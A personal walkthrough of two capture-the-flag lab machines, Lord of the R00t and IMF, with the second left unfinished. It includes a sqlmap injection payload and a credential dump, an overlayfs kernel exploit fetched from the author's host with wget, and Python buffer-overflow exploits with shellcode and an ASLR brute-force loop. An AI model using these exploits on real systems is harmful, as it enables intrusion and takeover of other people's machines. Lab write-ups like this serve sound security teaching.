Lord of the R00t

Finding the target first (the IP will change during this walkthrough because I'm changing location):

Nmap scan report for 192.168.0.19
Host is up (0.00044s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)

Ouch, just SSH?

Let’s run other scans in the meantime:

nmap -A 192.168.0.19
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 15:28 UTC
Nmap scan report for 192.168.0.19
Host is up (0.00035s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.0.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Still just SSH….

OK, when the VM starts, we see that user smeagol is the default login… Let’s see if it exists…

I found this exploit in the exploitdb database:

OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py

./40136.py
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES]
[--samples SAMPLES] [--factor FACTOR] [--trials TRIALS]
host

And user smeagol came back as positive….

So, trying to log in:

ssh smeagol@192.168.1.104

[ASCII-art banner: LOTR / Knock Friend To Enter]
Easy as 1,2,3
smeagol@192.168.1.104’s password:

The banner says "Knock Friend to Enter"...

Maybe I just have to knock these ports…

root@kali:~/boxes/lordoftheroot# nmap -sT -r -p1,2,3 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:34 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00069s latency).

PORT STATE SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
root@kali:~/boxes/lordoftheroot# nmap -p- 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:35 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.45 seconds

Bingo, a new port: 1337.

I opened it in Firefox and got just an image:

Checking if there’s something in the image… Nothing:
root@kali:~/boxes/lordoftheroot# /root/tools/stegextract/stegextract mordor.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done

So trying to enumerate this port a little more:

nmap -Pn -T4 -sV -A -v -p 1337 192.168.231.128

And in the meantime, trying gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.231.128:1337 > dirb.txt

The result of the nmap is not very detailed:

PORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 00:0C:29:1E:C1:79 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Uptime guess: 0.010 days (since Tue Sep 24 12:37:33 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

Let’s see what gobuster found:

root@kali:~/boxes/lordoftheroot# more dirb.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.231.128:1337
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/24 12:53:40 Starting gobuster
===============================================================
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/24 12:54:20 Finished
===============================================================

Nothing again…. Maybe Nikto?

root@kali:~/boxes/lordoftheroot# nikto -url http://192.168.231.128:1337
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.231.128
+ Target Hostname: 192.168.231.128
+ Target Port: 1337
+ Start Time: 2019-09-24 12:56:03 (GMT0)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2019-09-24 12:56:53 (GMT0) (50 seconds)
—————————————————————————
+ 1 host(s) tested

Not much.

So let’s see what’s in the image directory:

Robots.txt points to the hipster picture!

Let’s try Burp:

GET / HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: "40-51ffd65196807"
Cache-Control: max-age=0

If I try

GET /legolas HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: "40-51ffd65196807"
Cache-Control: max-age=0

Then I have:

HTTP/1.1 404 Not Found
Date: Tue, 24 Sep 2019 16:06:34 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh-->
</html>

Trying to decode the base64 message in the html comment:

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Then decode again!

/978345210/index.php

I saved my Burp request to a file and ran sqlmap on it:

sqlmap --batch -r burp.req

[13:17:15] [INFO] POST parameter ‘username’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[13:17:15] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[13:17:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to ‘http://192.168.231.128:1337/978345210/profile.php’. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[13:17:16] [INFO] checking if the injection point on POST parameter ‘username’ is a false positive
POST parameter ‘username’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=smeagol' AND (SELECT 7638 FROM (SELECT(SLEEP(5)))wbck) AND 'tVTj'='tVTj&password=motdepa&submit= Login

[13:17:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[13:17:31] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.231.128’

[*] ending @ 13:17:31 /2019-09-24/

Interesting!

So let’s try to retrieve the data:

sqlmap --batch -r burp.req --dump --method POST --dbms mysql

[13:28:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[13:28:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:28:09] [INFO] fetching current database
[13:28:09] [INFO] retrieved: Webapp
[13:28:29] [INFO] fetching tables for database: ‘Webapp’
[13:28:29] [INFO] fetching number of tables for database ‘Webapp’
[13:28:29] [INFO] retrieved: 1
[13:28:30] [INFO] retrieved: Users
[13:28:46] [INFO] fetching columns for table ‘Users’ in database ‘Webapp’
[13:28:46] [INFO] retrieved: 3
[13:28:49] [INFO] retrieved: id
[13:28:55] [INFO] retrieved: username
[13:29:17] [INFO] retrieved: password
[13:29:45] [INFO] fetching entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] fetching number of entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] retrieved: 5
[13:29:47] [WARNING] (case) time-based comparison requires reset of statistical model, please wait………………………… (done)
1
[13:29:49] [INFO] retrieved: iwilltakethering
[13:30:39] [INFO] retrieved: frodo
[13:30:57] [INFO] retrieved: 2
[13:31:00] [INFO] retrieved: MyPreciousR00t
[13:31:48] [INFO] retrieved: smeagol
[13:32:09] [INFO] retrieved: 3
[13:32:12] [INFO] retrieved: AndMySword
[13:32:50] [INFO] retrieved: aragorn
[13:33:10] [INFO] retrieved: 4
[13:33:14] [INFO] retrieved: AndMyBow
[13:33:45] [INFO] retrieved: legolas
[13:34:08] [INFO] retrieved: 5
[13:34:11] [INFO] retrieved: AndMyAxe
[13:34:40] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+
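The login flaw sqlmap found above, as an added example (not the box's own code, which is not on the page): a PHP login that splices the POST username and password straight into the query, beside a version using a prepared statement and hashed passwords. It assumes PHP 7.1+ with PDO and pdo_sqlite; the Users rows are the ones dumped above, re-created here as test data, and since SQLite has no SLEEP() a comment-based payload stands in for the time-based one.

```php
<?php
// Added example, not the box's code. SQLite in-memory stands in for MySQL; the
// root cause is the same: user input becomes part of the SQL text and is run as SQL.

// Test data: the five rows sqlmap dumped from Webapp.Users.
const USERS = [
    [1, 'frodo',   'iwilltakethering'],
    [2, 'smeagol', 'MyPreciousR00t'],
    [3, 'aragorn', 'AndMySword'],
    [4, 'legolas', 'AndMyBow'],
    [5, 'gimli',   'AndMyAxe'],
];

function seedUsers(PDO $db, string $table, bool $hashed): void {
    // $table is chosen by this script, never by user input.
    $db->exec("CREATE TABLE $table (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
    $ins = $db->prepare("INSERT INTO $table (id, username, password) VALUES (?, ?, ?)");
    foreach (USERS as [$id, $user, $pass]) {
        $ins->execute([$id, $user, $hashed ? password_hash($pass, PASSWORD_DEFAULT) : $pass]);
    }
}

// Vulnerable: string concatenation plus plaintext passwords (what the dump revealed).
function vulnerableLogin(PDO $db, string $u, string $p): ?string {
    $sql = "SELECT username FROM Users WHERE username='$u' AND password='$p'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Fixed: the prepared statement keeps input out of the SQL text, and the password
// is verified in PHP against a stored hash instead of being compared inside the query.
function safeLogin(PDO $db, string $u, string $p): ?string {
    $st = $db->prepare('SELECT username, password FROM Users_fixed WHERE username = ?');
    $st->execute([$u]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($p, $row['password'])) {
        return null;
    }
    return $row['username'];
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
seedUsers($db, 'Users', false);       // plaintext, as on the box
seedUsers($db, 'Users_fixed', true);  // hashed

// "-- " comments out the rest of the WHERE clause, so the password is never checked.
$payload = "smeagol'-- ";
printf("vulnerable, real creds: %s\n", vulnerableLogin($db, 'smeagol', 'MyPreciousR00t') ?? 'denied');
printf("vulnerable, payload   : %s\n", vulnerableLogin($db, $payload, 'wrong') ?? 'denied');
printf("fixed, real creds     : %s\n", safeLogin($db, 'smeagol', 'MyPreciousR00t') ?? 'denied');
printf("fixed, payload        : %s\n", safeLogin($db, $payload, 'wrong') ?? 'denied');
```

The vulnerable function returns smeagol for both inputs; the fixed one returns smeagol only for the real credentials. The blind extraction sqlmap performed works on the same principle, it just uses timing instead of a login result to read the answer.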

When I try these logins, they all send me to profile.php with the following picture:
[screenshot]

And a link to log out...

One interesting thing: it should display the login name but doesn't:
[screenshot]

<b id="welcome">Welcome : <i></i></b>

Trying to log in with SSH:

root@kali:~/boxes/lordoftheroot# ssh smeagol@192.168.231.128

[ASCII-art banner: LOTR / Knock Friend To Enter]
Easy as 1,2,3
smeagol@192.168.231.128’s password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

* Documentation: https://help.ubuntu.com/

[ASCII-art banner: LOTR / Welcome Friend]
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$

Bingo!

It seems the other logins can't SSH in; in /etc/passwd, smeagol is the only regular user with a shell:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin

smeagol@LordOfTheRoot:/etc$ sudo -l
[sudo] password for smeagol:
Sorry, user smeagol may not run sudo on LordOfTheRoot.

So now uploading LinEnum:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/linenum.sh
--2019-09-24 11:03:36-- http://192.168.1.124:9000/linenum.sh
Connecting to 192.168.1.124:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: 'linenum.sh'

100%[==================================================================================================================================================================>] 45,652 --.-K/s in 0.04s

2019-09-24 11:03:36 (1000 KB/s) - 'linenum.sh' saved [45652/45652]

smeagol@LordOfTheRoot:~$ chmod +x linenum.sh
smeagol@LordOfTheRoot:~$ ./linenum.sh -t

### SYSTEM ##############################################
[-] Kernel information:
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 3.19.0-25-generic (buildd@lgw01-57) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.3 LTS"
NAME="Ubuntu"
VERSION="14.04.3 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.3 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Looking for an exploit for this old Ubuntu:

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1) | exploits/linux/local/39166.c
root@kali:~/boxes/lordoftheroot/SECRET# cd /usr/share/exploitdb/exploits/linux/local/
root@kali:/usr/share/exploitdb/exploits/linux/local# dos2unix 39166.c

Starting a Python HTTP server on Kali and transferring the file:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/39166.c
--2019-09-25 11:46:01-- http://192.168.1.124:9000/39166.c
Connecting to 192.168.1.124:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2680 (2.6K) [text/plain]
Saving to: '39166.c'

100%[===========================================================================================================================================>] 2,680 --.-K/s in 0s

2019-09-25 11:46:01 (324 MB/s) - '39166.c' saved [2680/2680]

smeagol@LordOfTheRoot:~$ vi 39166.c
smeagol@LordOfTheRoot:~$ gcc 39166.c -o exploit
smeagol@LordOfTheRoot:~$ chmod +x exploit
smeagol@LordOfTheRoot:~$ ./exploit

root@LordOfTheRoot:~# whoami
root
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)

root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Now, there was a buffer overflow possible in the /SECRET directory... but the vulnerable file kept changing location.
I thought I had the right one but failed to find the address at which to inject my code.

But this script explains why it kept changing!

root@LordOfTheRoot:/root# cat switcher.py
#!/usr/bin/python
import os
from random import randint

# Reset all three doors: each gets a copy of the harmless binary, renamed to "file".
targets = ["/SECRET/door1/", "/SECRET/door2/", "/SECRET/door3/"]
for t in targets:
    os.system("rm " + t + "*")
    os.system("cp -p other " + t)
    os.system("cp -p " + t + "other " + t + "file")
    os.system("rm " + t + "other")

# Then one door, picked at random, gets the vulnerable binary instead.
luckyDoor = randint(0, 2)
t = targets[luckyDoor]
os.system("rm " + t + "*")
os.system("cp -p buf " + t)
os.system("cp -p " + t + "buf " + t + "file")
os.system("rm " + t + "buf")

But I still need to figure out why my BOF didn't work...
ASLR was enabled, that's one thing. But still... it should have worked!
I'll try again later.

--------------------------------------------------------------------------------------------------

OK, after a good night's sleep I'm back at the BOF part...

I already knew the buffer size, so let’s code the exploit directly:

root@kali:~/boxes/lordoftheroot# cat exploit.py
#!/usr/bin/python
nops = '\x90' * 64
shellcode = "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
pad = 'A' * (171 - 64 - 32)  # buffer size minus NOP sled minus shellcode length
eip = '1234'  # marker: if EIP reads 0x34333231 the offset is right
print nops + shellcode + pad + eip

gdb-peda$ run $(cat e3)
Starting program: /root/boxes/lordoftheroot/file $(cat e3)

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd560 (“AAAAAAA1234”)
EDX: 0xffffd265 (“AAAAAAA1234”)
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x41414141 (‘AAAA’)
ESP: 0xffffd270 –> 0x0

EIP: 0x34333231 (‘1234’)

EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x34333231
[————————————stack————————————-]
0000| 0xffffd270 –> 0x0
0004| 0xffffd274 –> 0xffffd304 –> 0xffffd49d (“/root/boxes/lordoftheroot/file”)
0008| 0xffffd278 –> 0xffffd310 –> 0xffffd56c (“SHELL=/bin/bash”)
0012| 0xffffd27c –> 0xffffd294 –> 0x0
0016| 0xffffd280 –> 0x1
0020| 0xffffd284 –> 0x0
0024| 0xffffd288 –> 0xf7fa3000 –> 0x1d9d6c
0028| 0xffffd28c –> 0xffffffff
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x34333231 in ?? ()
gdb-peda$ infor registers
Undefined command: “infor”. Try “help”.
gdb-peda$ info registers
eax 0x0 0x0
ecx 0xffffd560 0xffffd560
edx 0xffffd265 0xffffd265
ebx 0x0 0x0
esp 0xffffd270 0xffffd270
ebp 0x41414141 0x41414141
esi 0xf7fa3000 0xf7fa3000
edi 0xf7fa3000 0xf7fa3000
eip 0x34333231 0x34333231
eflags 0x10202 [ IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63

gdb-peda$ info frame
Stack level 0, frame at 0xffffd274:
eip = 0x34333231; saved eip = 0x0
called by frame at 0xffffd278
Arglist at 0xffffd26c, args:

Locals at 0xffffd26c, Previous frame’s sp is 0xffffd274

Saved registers:
eip at 0xffffd270

So now I control EIP.

And I have the address to jump to: 0xffffd274 (the stack slot right after the saved return address, where the NOP sled lands)

import struct
pad = "\x41" * 171
EIP = struct.pack("I", 0xffffd274)
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
NOP = "\x90" * 64
print pad + EIP + NOP + shellcode

On Kali, it works because ASLR is disabled:

root@kali:~/boxes/lordoftheroot# ./file $(python exploit2.py)
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

But on the target, I cannot disable ASLR….

So let’s do it differently:

The process is very well documented here: https://hacked0x90.wordpress.com/2016/10/30/bypassing-aslr-protection-using-brute-force/

First we need to find an address to use...

This small piece of C will do it for us (it prints the address of a stack variable):

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *addr;
    printf("%p\n", &addr);  /* address of a local, i.e. somewhere on the current stack */
    return 0;
}

Compile it with gcc -m32.

Then execute it and it will give an address to use.
Update the exploit below with this address, and run ls -alR /SECRET to see where the vulnerable executable currently is.
Update the exploit quickly, before the file moves again, and run it:

#!/usr/bin/python
import os

# Keep running the vulnerable binary with the same guessed stack address until the
# randomised stack happens to put the NOP sled on it.
i = 1
while True:
    eipOffset = 171
    RandomAddress = '\x8c\x4c\x95\xff'  # address printed by the C helper above
    nopSleds = 20480
    shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
    exploit = ('A' * eipOffset) + RandomAddress + ('\x90' * nopSleds) + shellcode
    print "BruteForce ASLR Trial Number " + str(i)
    os.system("/root/boxes/lordoftheroot/file" + ' ' + exploit)
    i = i + 1

Bam! root after 361 iterations!

IMF – Impossible Mission Force

Very nice machine! A lot of different techniques involved there….

Finding the target first:

root@kali:~# nmap -Pn -T4 192.168.1.0/24

Nmap scan report for imf.lan (192.168.1.234)
Host is up (0.00037s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

Then launching an intensive scan while I inspect the website:

It shows only port 80 …

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF – Homepage
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

Except for one contact form, not much for now... So let's enumerate:

root@kali:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.234
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.234
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/18 13:00:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/less (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/18 13:01:40 Finished
===============================================================

root@kali:~# nikto -url http://192.168.1.234
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.234
+ Target Hostname: 192.168.1.234
+ Target Port: 80
+ Start Time: 2019-09-18 13:04:33 (GMT0)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-18 13:05:22 (GMT0) (49 seconds)
—————————————————————————

Checking if a flag is in the images:

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract roundlogo.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract brain.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

Nothing there, so trying the contact form with Burp:

POST /contact.php HTTP/1.1
Host: 192.168.1.234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.234/contact.php

Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Upgrade-Insecure-Requests: 1

email=erik%40erik.com&name=philippe&comments=test+comment

Trying different options but no results for now…

But I just thought about something! The first flag is Base64 encoded!

If I decode it, I have:
allthefiles

So let’s try this :

http://192.168.1.234/allthefiles

Crap, 404 Not Found!

Changing IP range due to a location change… target is now 192.168.0.18
